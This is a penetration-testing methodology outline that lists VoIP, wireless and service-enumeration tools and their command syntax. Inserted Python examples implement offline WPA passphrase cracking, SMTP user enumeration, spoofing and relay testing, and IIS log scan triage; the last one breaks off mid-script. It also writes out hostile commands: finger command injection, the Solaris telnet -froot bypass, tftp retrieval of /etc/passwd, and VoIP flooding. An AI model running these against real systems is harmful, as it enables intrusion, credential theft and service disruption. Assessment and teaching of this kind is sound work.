Penetration Testing Framework 0.58


1. Back end files

1.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

2. Nabil contributed the AS/400 section.

3. VoIP Security

3.1. Sniffing Tools

3.1.1. AuthTool

3.1.2. Cain & Abel

3.1.3. Etherpeek

3.1.4. NetDude

3.1.5. Oreka

3.1.6. PSIPDump

3.1.7. SIPomatic

3.1.8. SIPv6 Analyzer

3.1.9. UCSniff

3.1.10. VoiPong

3.1.11. VOMIT

3.1.12. Wireshark

3.1.13. WIST - Web Interface for SIP Trace

3.2. Scanning and Enumeration Tools

3.2.1. enumIAX

3.2.2. fping

3.2.3. IAX Enumerator

3.2.4. iWar

3.2.5. Nessus

3.2.6. Nmap

3.2.7. SIP Forum Test Framework (SFTF)

3.2.8. SIPcrack

3.2.9. sipflanker

3.2.9.1. python sipflanker.py 192.168.1-254

3.2.10. SIP-Scan

3.2.11. SIP.Tastic

3.2.12. SIPVicious

3.2.13. SiVuS

3.2.14. SMAP

3.2.14.1. smap IP_Address/Subnet_Mask

3.2.14.2. smap -o IP_Address/Subnet_Mask

3.2.14.3. smap -l IP_Address

3.2.15. snmpwalk

3.2.16. VLANping

3.2.17. VoIPAudit

3.2.18. VoIP GHDB Entries

3.2.19. VoIP Voicemail Database

3.3. Packet Creation and Flooding Tools

3.3.1. H.323 Injection Files

3.3.2. H225regreject

3.3.3. IAXHangup

3.3.4. IAXAuthJack

3.3.5. IAX.Brute

3.3.6. IAXFlooder

3.3.6.1. ./iaxflood sourcename destinationname numpackets

3.3.7. INVITE Flooder

3.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets

3.3.8. kphone-ddos

3.3.9. RTP Flooder

3.3.10. rtpbreak

3.3.11. Scapy

3.3.12. Seagull

3.3.13. SIPBomber

3.3.14. SIPNess

3.3.15. SIPp

3.3.16. SIPsak

3.3.16.1. Tracing paths: sipsak -T -s sip:username@domain

3.3.16.2. OPTIONS request: sipsak -vv -s sip:username@domain

3.3.16.3. Query registered bindings: sipsak -I -C empty -a password -s sip:username@domain

3.3.17. SIP-Send-Fun

3.3.18. SIPVicious

3.3.19. Spitter

3.3.20. TFTP Brute Force

3.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>

3.3.21. UDP Flooder

3.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

3.3.22. UDP Flooder (with VLAN Support)

3.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

3.3.23. Voiphopper

3.4. Fuzzing Tools

3.4.1. Asteroid

3.4.2. Codenomicon VoIP Fuzzers

3.4.3. Fuzzy Packet

3.4.4. Mu Security VoIP Fuzzing Platform

3.4.5. ohrwurm RTP Fuzzer

3.4.6. PROTOS H.323 Fuzzer

3.4.7. PROTOS SIP Fuzzer

3.4.8. SIP Forum Test Framework (SFTF)

3.4.9. Sip-Proxy

3.4.10. Spirent ThreatEx

3.5. Signaling Manipulation Tools

3.5.1. AuthTool

3.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

3.5.2. BYE Teardown

3.5.3. Check Sync Phone Rebooter

3.5.4. RedirectPoison

3.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"

3.5.5. Registration Adder

3.5.6. Registration Eraser

3.5.7. Registration Hijacker

3.5.8. SIP-Kill

3.5.9. SIP-Proxy-Kill

3.5.10. SIP-RedirectRTP

3.5.11. SipRogue

3.5.12. vnak

3.6. Media Manipulation Tools

3.6.1. RTP InsertSound

3.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

3.6.2. RTP MixSound

3.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

3.6.3. RTPProxy

3.6.4. RTPInject

3.7. Generic Software Suites

3.7.1. OAT Office Communication Server Tool Assessment

3.7.2. EnableSecurity VOIPPACK

3.7.2.1. Note: - Add-on for Immunity Canvas

3.8. References

3.8.1. URL's

3.8.1.1. Common Vulnerabilities and Exploits (CVE)

3.8.1.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip

3.8.1.2. Default Passwords

3.8.1.3. Hacking Exposed VoIP

3.8.1.3.1. Tool Pre-requisites

3.8.1.4. VoIPsa

3.8.2. White Papers

3.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems

3.8.2.2. An Analysis of VoIP Security Threats and Tools

3.8.2.3. Hacking VoIP Exposed

3.8.2.4. Security testing of SIP implementations

3.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks

3.8.2.6. Two attacks against VoIP

3.8.2.7. VoIP Attacks!

3.8.2.8. VoIP Security Audit Program (VSAP)

4. Wireless Penetration

4.1. Wireless Assessment. The following information should ideally be obtained and enumerated when carrying out a wireless assessment. All of it is needed to give the tester, and hence the customer, a clear and concise picture of the network being assessed. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the time required to carry out the assessment.

4.1.1. Site Map

4.1.1.1. RF Map

4.1.1.1.1. Lines of Sight

4.1.1.1.2. Signal Coverage

4.1.1.2. Physical Map

4.1.1.2.1. Triangulate APs

4.1.1.2.2. Satellite Imagery

4.1.2. Network Map

4.1.2.1. MAC Filter

4.1.2.1.1. Authorised MAC Addresses

4.1.2.1.2. Reaction to Spoofed MAC Addresses

4.1.2.2. Encryption Keys utilised

4.1.2.2.1. WEP

4.1.2.2.2. WPA/PSK

4.1.2.2.3. 802.1x

4.1.2.3. Access Points

4.1.2.3.1. ESSID

4.1.2.3.2. BSSIDs

4.1.2.4. Wireless Clients

4.1.2.4.1. MAC Addresses

4.1.2.4.2. Intercepted Traffic

4.2. Wireless Toolkit

4.2.1. Wireless Discovery

4.2.1.1. Aerosol

4.2.1.2. Airfart

4.2.1.3. Aphopper

4.2.1.4. Apradar

4.2.1.5. BAFFLE

4.2.1.6. inSSIDer

4.2.1.7. iWEPPro

4.2.1.8. karma

4.2.1.9. KisMAC-ng

4.2.1.10. Kismet

4.2.1.11. MiniStumbler

4.2.1.12. Netstumbler

4.2.1.13. Vistumbler

4.2.1.14. Wellenreiter

4.2.1.15. Wifi Hopper

4.2.1.16. WirelessMon

4.2.1.17. WiFiFoFum

4.2.2. Packet Capture

4.2.2.1. Airopeek

4.2.2.2. Airpcap

4.2.2.3. Airtraf

4.2.2.4. Apsniff

4.2.2.5. Cain

4.2.2.6. Commview

4.2.2.7. Ettercap

4.2.2.8. Netmon

4.2.2.8.1. nmwifi

4.2.2.9. Wireshark

4.2.3. EAP Attack tools

4.2.3.1. eapmd5pass

4.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump


4.2.4. Leap Attack Tools

4.2.4.1. asleap

4.2.4.2. thc leap cracker

4.2.4.3. anwrap

4.2.5. WEP/ WPA Password Attack Tools

4.2.5.1. Airbase

4.2.5.2. Aircrack-ptw

4.2.5.3. Aircrack-ng

4.2.5.4. Airsnort

4.2.5.5. cowpatty

4.2.5.6. FiOS Wireless Key Calculator

4.2.5.7. iWifiHack

4.2.5.8. KisMAC-ng

4.2.5.9. Rainbow Tables

4.2.5.10. wep attack

4.2.5.11. wep crack

4.2.5.12. wzcook

4.2.6. Frame Generation Software

4.2.6.1. Airgobbler

4.2.6.2. airpwn

4.2.6.3. Airsnarf

4.2.6.4. Commview

4.2.6.5. fake ap

4.2.6.6. void 11

4.2.6.7. wifi tap

4.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]

4.2.6.8. FreeRADIUS - Wireless Pwnage Edition

4.2.7. Mapping Software

4.2.7.1. Online Mapping

4.2.7.1.1. WIGLE

4.2.7.1.2. Skyhook

4.2.7.2. Tools

4.2.7.2.1. Knsgem

4.2.8. File Format Conversion Tools

4.2.8.1. ns1 recovery and conversion tool

4.2.8.2. warbable

4.2.8.3. warkizniz

4.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]

4.2.8.4. ivstools

4.2.9. IDS Tools

4.2.9.1. WIDZ

4.2.9.2. War Scanner

4.2.9.3. Snort-Wireless

4.2.9.4. AirDefense

4.2.9.5. AirMagnet

4.3. WLAN discovery

4.3.1. Unencrypted WLAN

4.3.1.1. Visible SSID

4.3.1.1.1. Sniff for IP range

4.3.1.2. Hidden SSID

4.3.1.2.1. Deauth client

4.3.2. WEP encrypted WLAN

4.3.2.1. Visible SSID

4.3.2.1.1. WEPattack

4.3.2.2. Hidden SSID

4.3.2.2.1. Deauth client

4.3.3. WPA / WPA2 encrypted WLAN

4.3.3.1. Deauth client

4.3.3.1.1. Capture EAPOL handshake
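What cowpatty and aircrack-ng do with the captured EAPOL handshake, as an added worked example (not code from the Penetration Testing Framework or from those tools): derive the PMK from the candidate passphrase and SSID, expand it to the PTK and take the KCK, recompute the MIC of handshake message 2 and compare it to the captured one. The 802.11i PSK test vector ("password"/"IEEE") checks the PBKDF2 step. The handshake used below is synthesised by `make_handshake` with made-up MAC addresses and random nonces, so it is not a real capture; descriptor versions 1 (HMAC-MD5) and 2 (HMAC-SHA1) are handled, AES-CMAC (version 3) is not.

```python
import hashlib
import hmac
import os

# EAPOL header (4) + descriptor type (1) + key info (2) + key length (2) + replay counter (8)
# + nonce (32) + IV (16) + RSC (8) + ID (8) = 81: the MIC field starts here and is 16 bytes long
MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8


def pmk_from_passphrase(passphrase, ssid):
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_kck(pmk, aa, spa, anonce, snonce):
    """KCK = first 16 bytes of PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:16]


def eapol_mic(kck, eapol_frame, key_descriptor_version):
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed: HMAC-MD5 (v1, TKIP) or HMAC-SHA1-128 (v2, CCMP)."""
    digest = hashlib.md5 if key_descriptor_version == 1 else hashlib.sha1
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, digest).digest()[:16]


def crack(handshake, wordlist):
    """Offline dictionary attack: recompute the message-2 MIC for each candidate and compare to the captured MIC."""
    hs = handshake
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = derive_kck(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["version"]), hs["mic"]):
            return candidate
    return None


def make_handshake(passphrase, ssid, version=2):
    """Constructed handshake (not a real capture): message 2 of the 4-way handshake with a valid MIC."""
    aa, spa = bytes.fromhex("00112233aabb"), bytes.fromhex("66778899ccdd")   # made-up AP and client MACs
    anonce, snonce = os.urandom(32), os.urandom(32)
    key_info = (0x0100 | 0x0008 | version).to_bytes(2, "big")               # MIC bit, pairwise bit, version
    body = (b"\x02" + key_info + b"\x00\x10" + bytes(8) + snonce + bytes(16) + bytes(8) + bytes(8)
            + bytes(16) + b"\x00\x00")                                       # zero MIC, empty key data
    eapol = b"\x01\x03" + len(body).to_bytes(2, "big") + body
    kck = derive_kck(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
    mic = eapol_mic(kck, eapol, version)
    eapol = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "eapol": eapol, "mic": mic, "version": version}


if __name__ == "__main__":
    hs = make_handshake("password", "IEEE")
    print(crack(hs, ["letmein", "password", "qwerty"]))
```

The PBKDF2 step dominates the cost (4096 HMAC-SHA1 rounds per candidate), which is why precomputed PMK tables (the "Rainbow Tables" entry above) are only useful per SSID: the SSID is the salt.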

4.3.4. LEAP encrypted WLAN

4.3.4.1. Deauth client

4.3.4.1.1. Break LEAP

4.3.5. 802.1x WLAN

4.3.5.1. Create Rogue Access Point

4.3.5.1.1. Airsnarf

4.3.5.1.2. fake ap

4.3.5.1.3. Hotspotter

4.3.5.1.4. Karma

4.3.5.1.5. Linux rogue AP

4.3.6. Resources

4.3.6.1. URL's

4.3.6.1.1. Wirelessdefence.org

4.3.6.1.2. Russix

4.3.6.1.3. Wardrive.net

4.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)

4.3.6.2. White Papers

4.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4

4.3.6.2.2. 802.11b Firmware-Level Attacks

4.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective

4.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment

4.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds

4.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz

4.3.6.2.7. Active behavioral fingerprinting of wireless devices

4.3.6.3. Common Vulnerabilities and Exploits (CVE)

4.3.6.3.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless

5. Pre-Inspection Visit - template

6. pwdump [-h][-o][-u][-p] machineName

7. Client Side Security

8. Enumeration

8.1. Daytime port 13 open

8.1.1. nmap nse script

8.1.1.1. daytime

8.2. FTP port 21 open

8.2.1. Fingerprint server

8.2.1.1. telnet ip_address 21 (Banner grab)

8.2.1.2. Run command ftp ip_address

8.2.1.3. ftp@example.com

8.2.1.4. Check for anonymous access

8.2.1.4.1. ftp ip_addressUsername: anonymous OR anonPassword: any@email.com

8.2.2. Password guessing

8.2.2.1. Hydra brute force

8.2.2.2. medusa

8.2.2.3. Brutus

8.2.3. Examine configuration files

8.2.3.1. ftpusers

8.2.3.2. ftp.conf

8.2.3.3. proftpd.conf

8.2.4. MiTM

8.2.4.1. pasvagg.pl

8.3. SSH port 22 open

8.3.1. Fingerprint server

8.3.1.1. telnet ip_address 22 (banner grab)

8.3.1.2. scanssh

8.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

8.3.2. Password guessing

8.3.2.1. ssh root@ip_address

8.3.2.2. guess-who

8.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location

8.3.2.3. Hydra brute force

8.3.2.4. brutessh

8.3.2.5. Ruby SSH Bruteforcer

8.3.3. Examine configuration files

8.3.3.1. ssh_config

8.3.3.2. sshd_config

8.3.3.3. authorized_keys

8.3.3.4. ssh_known_hosts

8.3.3.5. .shosts

8.3.4. SSH Client programs

8.3.4.1. tunnelier

8.3.4.2. winsshd

8.3.4.3. putty

8.3.4.4. winscp

8.4. Telnet port 23 open

8.4.1. Fingerprint server

8.4.1.1. telnet ip_address

8.4.1.1.1. Common Banner List (OS: banner)
Solaris 8: SunOS 5.8
Solaris 2.6: SunOS 5.6
Solaris 2.4 or 2.5.1: Unix(r) System V Release 4.0 (hostname)
SunOS 4.1.x: SunOS Unix (hostname)
FreeBSD: FreeBSD/i386 (hostname) (ttyp1)
NetBSD: NetBSD/i386 (hostname) (ttyp1)
OpenBSD: OpenBSD/i386 (hostname) (ttyp1)
Red Hat 8.0: Red Hat Linux release 8.0 (Psyche)
Debian 3.0: Debian GNU/Linux 3.0 / hostname
SGI IRIX 6.x: IRIX (hostname)
IBM AIX 4.1.x: AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
IBM AIX 4.2.x or 4.3.x: AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
Nokia IPSO: IPSO (hostname) (ttyp0)
Cisco IOS: User Access Verification
Livingston ComOS: ComOS - Livingston PortMaster

8.4.1.2. telnetfp

8.4.2. Password Attack


8.4.2.2. Hydra brute force

8.4.2.3. Brutus

8.4.2.4. telnet -l "-froot" hostname (Solaris 10: in.telnetd passes the -f argument through to login and skips authentication on unpatched hosts)

8.4.3. Examine configuration files

8.4.3.1. /etc/inetd.conf

8.4.3.2. /etc/xinetd.d/telnet

8.4.3.3. /etc/xinetd.d/stelnet

8.5. Sendmail Port 25 open

8.5.1. Fingerprint server

8.5.1.1. telnet ip_address 25 (banner grab)

8.5.2. Mail Server Testing

8.5.2.1. Enumerate users

8.5.2.1.1. VRFY username (asks the server to confirm that a mailbox exists: 250/251 exists, 550 unknown, 252 server will not confirm; used for account enumeration)

8.5.2.1.2. EXPN alias (expands a mailing list or alias to its member addresses; enumerates the accounts behind aliases such as postmaster or staff)

8.5.2.2. Mail Spoof Test

8.5.2.2.1. HELO anything
MAIL FROM: spoofed_address
RCPT TO: valid_mail_account
DATA
(message body)
.
QUIT

8.5.2.3. Mail Relay Test

8.5.2.3.1. HELO anything
MAIL FROM: address_at_external_domain
RCPT TO: address_at_another_external_domain
(a 250 at RCPT TO means the server relays for third parties; send RSET rather than DATA so no message is queued)
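The three mail server tests above (VRFY/EXPN enumeration, spoof, relay) scripted end to end, as an added example that is not part of the Penetration Testing Framework. It interprets the reply codes rather than just sending the commands, reads multi-line replies correctly, and backs out of the relay test with RSET so nothing is queued. `smtp_transport` talks to a real server; `FakeSmtp` is a constructed in-memory stand-in (VRFY enabled, EXPN disabled, relaying refused, like a default sendmail) so the example runs offline.

```python
import socket


def smtp_transport(host, port=25, timeout=10.0):
    """Connect to a real server; returns (banner, send), where send(cmd) writes one command and returns the whole reply."""
    sock = socket.create_connection((host, port), timeout)
    f = sock.makefile("rwb", buffering=0)

    def read_reply():
        lines = []
        while True:
            line = f.readline().decode("latin-1").rstrip("\r\n")
            lines.append(line)
            if len(line) < 4 or line[3] != "-":        # "250-text" continues, "250 text" ends the reply
                return "\n".join(lines)

    def send(cmd):
        f.write((cmd + "\r\n").encode("latin-1"))
        return read_reply()

    return read_reply(), send


def code(reply):
    return int(reply[:3])


def enumerate_users(send, helo, users):
    """VRFY/EXPN probe. 250/251: exists. 252: server refuses to confirm (inconclusive). 550/551/553: unknown.
    500/502: the verb is disabled, so the other verb is tried."""
    send(f"HELO {helo}")
    found = {}
    for user in users:
        for verb in ("VRFY", "EXPN"):
            reply = send(f"{verb} {user}")
            c = code(reply)
            if c in (250, 251):
                found[user] = (verb, reply)
                break
            if c == 252:
                found.setdefault(user, ("inconclusive", reply))
    return found


def relay_test(send, helo, external_sender, external_recipient):
    """Open-relay check: both addresses are foreign to the server. 250 at RCPT means it relays. RSET, not DATA."""
    send(f"HELO {helo}")
    send(f"MAIL FROM:<{external_sender}>")
    reply = send(f"RCPT TO:<{external_recipient}>")
    send("RSET")
    return code(reply) in (250, 251), reply


def spoof_test(send, helo, spoofed_sender, internal_recipient, subject="Spoof test"):
    """The spoof test as listed above: forged local sender, real local mailbox, DATA, '.'; True if the message was accepted."""
    send(f"HELO {helo}")
    send(f"MAIL FROM:<{spoofed_sender}>")
    if code(send(f"RCPT TO:<{internal_recipient}>")) not in (250, 251):
        send("RSET")
        return False
    if code(send("DATA")) != 354:
        send("RSET")
        return False
    return code(send(f"Subject: {subject}\r\n\r\nSent by the spoof test.\r\n.")) == 250


class FakeSmtp:
    """Constructed in-memory server so the example runs offline; not a real MTA."""
    def __init__(self, domain, users):
        self.domain, self.users, self.in_data = domain, set(users), False

    def __call__(self, line):
        if self.in_data:                                # the whole DATA body (ending in '.') arrives as one write
            self.in_data = False
            return "250 2.0.0 Message accepted for delivery"
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            return f"250 {self.domain} Hello"
        if verb == "VRFY":
            user = arg.strip("<>").split("@")[0]
            return f"250 2.1.5 <{user}@{self.domain}>" if user in self.users else f"550 5.1.1 {arg}... User unknown"
        if verb == "EXPN":
            return "502 5.7.0 Sorry, we do not allow this operation"
        if verb == "MAIL":
            return "250 2.1.0 Sender ok"
        if verb == "RCPT":
            rcpt = arg.split(":", 1)[1].strip("<> ")
            return "250 2.1.5 Recipient ok" if rcpt.endswith("@" + self.domain) else "550 5.7.1 Relaying denied"
        if verb == "DATA":
            self.in_data = True
            return '354 Enter mail, end with "." on a line by itself'
        if verb == "RSET":
            return "250 2.0.0 Reset state"
        if verb == "QUIT":
            return "221 2.0.0 Bye"
        return "500 5.5.1 Command unrecognized"
```

Against a real host: `banner, send = smtp_transport("mail.example.com")`, then pass `send` to the three functions. Treat 252 as "maybe": some servers answer it for every VRFY, which is a deliberate anti-enumeration setting, not a hit.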

8.5.3. Examine Configuration Files

8.5.3.1. sendmail.cf

8.5.3.2. submit.cf

8.6. DNS port 53 open

8.6.1. Fingerprint server/ service

8.6.1.1. host

8.6.1.1.1. host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]
-v verbose output
-t type: query for a specific record type, e.g. A, NS or PTR
-a same as -t ANY
-l zone transfer (AXFR) of the zone, if the server allows it
-f save output to the named file (older host implementations only)

8.6.1.2. nslookup

8.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]

8.6.1.3. dig

8.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]

8.6.1.4. whois
-h host: use the named host to resolve the query
-a use ARIN to resolve the query
-r use RIPE to resolve the query
-p use APNIC to resolve the query
-Q perform a quick lookup

8.6.2. DNS Enumeration

8.6.2.1. Bile Suite

8.6.2.1.1. perl BiLE.pl [website] [project_name]

8.6.2.1.2. perl BiLE-weigh.pl [website] [input file]

8.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>

8.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]

8.6.2.1.5. perl exp-tld.pl [input file] [output file]

8.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]

8.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]

8.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]

8.6.2.2. txdns

8.6.2.2.1. txdns -rt -t domain_name

8.6.2.2.2. txdns -x 50 -bb domain_name

8.6.2.3. nmap nse scripts

8.6.2.3.1. dns-random-srcport

8.6.2.3.2. dns-random-txid

8.6.2.3.3. dns-recursion

8.6.2.3.4. dns-zone-transfer

8.6.3. Examine Configuration Files

8.6.3.1. host.conf

8.6.3.2. resolv.conf

8.6.3.3. named.conf

8.7. TFTP port 69 open

8.7.1. TFTP Enumeration

8.7.1.1. tftp ip_address PUT local_file

8.7.1.2. tftp ip_address GET conf.txt (or other files)

8.7.1.3. Solarwinds TFTP server

8.7.1.4. tftp -i <IP> GET /etc/passwd (old Solaris)

8.7.2. TFTP Bruteforcing

8.7.2.1. TFTP bruteforcer

8.7.2.2. Cisco-Torch

8.8. Finger Port 79 open

8.8.1. User enumeration

8.8.1.1. finger 'a b c d e f g h' @example.com

8.8.1.2. finger admin@example.com

8.8.1.3. finger user@example.com

8.8.1.4. finger 0@example.com

8.8.1.5. finger .@example.com

8.8.1.6. finger **@example.com

8.8.1.7. finger test@example.com

8.8.1.8. finger @example.com

8.8.1.9. nmap nse script

8.8.1.9.1. finger

8.8.2. Command execution

8.8.2.1. finger "|/bin/id@example.com"

8.8.2.2. finger "|/bin/ls -a /@example.com"

8.8.3. Finger Bounce

8.8.3.1. finger user@host@victim

8.8.3.2. finger @internal@external

8.9. Web Ports 80,8080 etc. open

8.9.1. Fingerprint server

8.9.1.1. Telnet ip_address port

8.9.1.2. Firefox plugins

8.9.1.2.1. All

8.9.1.2.2. Specific

8.9.2. Crawl website

8.9.2.1. lynx [options] startfile/URL (useful options: -traversal, -crawl, -dump, -image_links, -source)

8.9.2.2. httprint

8.9.2.3. Metagoofil

8.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

8.9.3. Web Directory enumeration

8.9.3.1. Nikto

8.9.3.1.1. nikto [-h target] [options]

8.9.3.2. DirBuster

8.9.3.3. Wikto

8.9.3.4. Goolag Scanner

8.9.4. Vulnerability Assessment

8.9.4.1. Manual Tests

8.9.4.1.1. Default Passwords

8.9.4.1.2. Install Backdoors

8.9.4.1.3. Method Testing

8.9.4.1.4. Upload Files

8.9.4.1.5. View Page Source

8.9.4.1.6. Input Validation Checks

8.9.4.1.7. Automated table and column iteration

8.9.4.2. Vulnerability Scanners

8.9.4.2.1. Acunetix

8.9.4.2.2. Grendelscan

8.9.4.2.3. NStealth

8.9.4.2.4. Obiwan III

8.9.4.2.5. w3af

8.9.4.3. Specific Applications/ Server Tools

8.9.4.3.1. Domino

8.9.4.3.2. Joomla

8.9.4.3.3. aspaudit.pl

8.9.4.3.4. Vbulletin

8.9.4.3.5. ZyXel

8.9.5. Proxy Testing

8.9.5.1. Burpsuite

8.9.5.2. Crowbar

8.9.5.3. Interceptor

8.9.5.4. Paros

8.9.5.5. Requester Raw

8.9.5.6. Suru

8.9.5.7. WebScarab

8.9.6. Examine configuration files

8.9.6.1. Generic

8.9.6.1.1. Examine httpd.conf/ windows config files

8.9.6.2. JBoss

8.9.6.2.1. JMX Console http://<IP>:8080/jmx-console/ (unauthenticated by default on older JBoss releases; deploying an MBean from here gives code execution)

8.9.6.3. Joomla

8.9.6.3.1. configuration.php

8.9.6.3.2. diagnostics.php

8.9.6.3.3. joomla.inc.php

8.9.6.3.4. config.inc.php

8.9.6.4. Mambo

8.9.6.4.1. configuration.php

8.9.6.4.2. config.inc.php

8.9.6.5. Wordpress

8.9.6.5.1. setup-config.php

8.9.6.5.2. wp-config.php

8.9.6.6. ZyXel

8.9.6.6.1. /WAN.html (contains PPPoE ISP password)

8.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)

8.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)

8.9.6.6.4. /Firewall_DefPolicy.html (Firewall)

8.9.6.6.5. /CF_Keyword.html (Content Filter)

8.9.6.6.6. /RemMagWWW.html (Remote MGMT)

8.9.6.6.7. /rpSysAdmin.html (System)

8.9.6.6.8. /LAN_IP.html (LAN)

8.9.6.6.9. /NAT_General.html (NAT)

8.9.6.6.10. /ViewLog.html (Logs)

8.9.6.6.11. /rpFWUpload.html (Tools)

8.9.6.6.12. /DiagGeneral.html (Diagnostic)

8.9.6.6.13. /RemMagSNMP.html (SNMP Passwords)

8.9.6.6.14. /LAN_ClientList.html (Current DHCP Leases)

8.9.6.6.15. Config Backups

8.9.7. Examine web server logs

8.9.7.1. c:\winnt\system32\Logfiles\W3SVC1

8.9.7.1.1. awk -F " " '{print $3,$11}' filename | sort | uniq -c (column numbers depend on the #Fields: line of the log; check it before trusting $3 as client IP and $11 as status)
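The awk one-liner above depends on fixed column positions, which differ between IIS versions and logging configurations. This added example (not from the Penetration Testing Framework) reads the `#Fields:` directive so columns are looked up by name, reproduces the IP/status count, and then triages the log for the two things a reviewer looks for first: clients generating many 4xx/5xx responses (forced browsing) and requests matching classic IIS scanner patterns. `SAMPLE_LOG` and `SCAN_PATTERNS` are constructed for the example.

```python
import collections
import re

# Constructed sample in IIS W3C extended format; the field order here is one of several IIS uses
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2009-03-10 09:00:00
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2009-03-10 09:00:01 10.0.0.5 - 192.168.1.10 80 GET /default.htm - 200 Mozilla/4.0
2009-03-10 09:00:02 10.0.0.5 - 192.168.1.10 80 GET /admin/ - 404 Mozilla/4.0
2009-03-10 09:00:03 10.0.0.5 - 192.168.1.10 80 GET /backup/ - 404 Mozilla/4.0
2009-03-10 09:00:04 10.0.0.5 - 192.168.1.10 80 GET /old/ - 404 Mozilla/4.0
2009-03-10 09:00:05 10.0.0.9 - 192.168.1.10 80 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 500 -
2009-03-10 09:00:06 10.0.0.7 - 192.168.1.10 80 GET /index.htm - 200 Mozilla/4.0
"""

# Constructed patterns for classic IIS probing: traversal, Unicode/overlong encodings, cmd.exe, .ida, FrontPage
SCAN_PATTERNS = re.compile(r"(\.\./|%c[01]%|cmd\.exe|\.ida\b|/scripts/|/_vti_bin/)", re.I)


def parse_w3c(lines):
    """Yield one dict per request, keyed by the names in the #Fields: directive (so column order does not matter)."""
    fields = None
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip() or fields is None:
            continue
        else:
            values = line.split(" ")
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def ip_status_counts(records):
    """What the awk one-liner prints: (client IP, status) pairs with their counts."""
    return collections.Counter((r["c-ip"], r["sc-status"]) for r in records)


def triage(records, error_threshold=3):
    """Flag client IPs with error_threshold or more 4xx/5xx responses, or any request matching SCAN_PATTERNS."""
    by_ip = collections.defaultdict(lambda: {"requests": 0, "errors": 0, "hits": []})
    for r in records:
        entry = by_ip[r["c-ip"]]
        entry["requests"] += 1
        if r["sc-status"][:1] in ("4", "5"):
            entry["errors"] += 1
        target = r.get("cs-uri-stem", "") + "?" + r.get("cs-uri-query", "")
        if SCAN_PATTERNS.search(target):
            entry["hits"].append(target)
    return {ip: e for ip, e in by_ip.items() if e["errors"] >= error_threshold or e["hits"]}


if __name__ == "__main__":
    recs = list(parse_w3c(SAMPLE_LOG.splitlines()))
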